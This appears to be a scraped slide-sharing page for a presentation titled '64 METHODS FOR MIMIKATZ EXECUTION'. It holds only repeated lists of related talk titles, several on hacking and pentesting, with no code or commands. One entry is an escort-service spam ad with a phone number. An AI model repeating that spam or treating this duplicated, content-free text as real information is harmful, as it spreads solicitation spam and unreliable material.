I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Container Security
Container SecurityContainer Security
Container Security
 
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Introducing Vault
Introducing VaultIntroducing Vault
Introducing Vault
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
Metasploit
MetasploitMetasploit
Metasploit
 

Similar to 64 METHODS FOR MIMIKATZ EXECUTION

Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringPiwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringTakashi Yamamoto
 
Using Nix and Docker as automated deployment solutions
Using Nix and Docker as automated deployment solutionsUsing Nix and Docker as automated deployment solutions
Using Nix and Docker as automated deployment solutionsSander van der Burg
 
우리가 모르는 노드로 할 수 있는 몇가지
우리가 모르는 노드로 할 수 있는 몇가지우리가 모르는 노드로 할 수 있는 몇가지
우리가 모르는 노드로 할 수 있는 몇가지Rhio Kim
 
From Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftFrom Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftEric D. Schabell
 
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지KTH, 케이티하이텔
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easierDavid Thomas
 
Cacti安装手册
Cacti安装手册Cacti安装手册
Cacti安装手册Yiwei Ma
 
Python maya 2018 setup note
Python maya 2018 setup notePython maya 2018 setup note
Python maya 2018 setup noteLee Jungpyo
 
Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Githubhubx
 
ActiveLAMP Process
ActiveLAMP ProcessActiveLAMP Process
ActiveLAMP ProcessTom Friedhof
 
Git dvcs and Information Security Review
Git dvcs and Information Security ReviewGit dvcs and Information Security Review
Git dvcs and Information Security Reviewdchaffiol
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Yuriy Senko
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usageSylvain Cortes
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGMatthew McCullough
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Mahmoud Hatem
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdfssuser785ce21
 

Similar to 64 METHODS FOR MIMIKATZ EXECUTION (20)

Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringPiwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
 
4 Sessions
4 Sessions4 Sessions
4 Sessions
 
Using Nix and Docker as automated deployment solutions
Using Nix and Docker as automated deployment solutionsUsing Nix and Docker as automated deployment solutions
Using Nix and Docker as automated deployment solutions
 
우리가 모르는 노드로 할 수 있는 몇가지
우리가 모르는 노드로 할 수 있는 몇가지우리가 모르는 노드로 할 수 있는 몇가지
우리가 모르는 노드로 할 수 있는 몇가지
 
From Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftFrom Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShift
 
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지
[H3 2012] 우리가 모르는 Node.js로 할 수 있는 몇가지
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easier
 
Cacti安装手册
Cacti安装手册Cacti安装手册
Cacti安装手册
 
Python maya 2018 setup note
Python maya 2018 setup notePython maya 2018 setup note
Python maya 2018 setup note
 
Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Github
 
ActiveLAMP Process
ActiveLAMP ProcessActiveLAMP Process
ActiveLAMP Process
 
Git dvcs and Information Security Review
Git dvcs and Information Security ReviewGit dvcs and Information Security Review
Git dvcs and Information Security Review
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usage
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUG
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdf
 

Recently uploaded

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 

Recently uploaded (20)

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 

64 METHODS FOR MIMIKATZ EXECUTION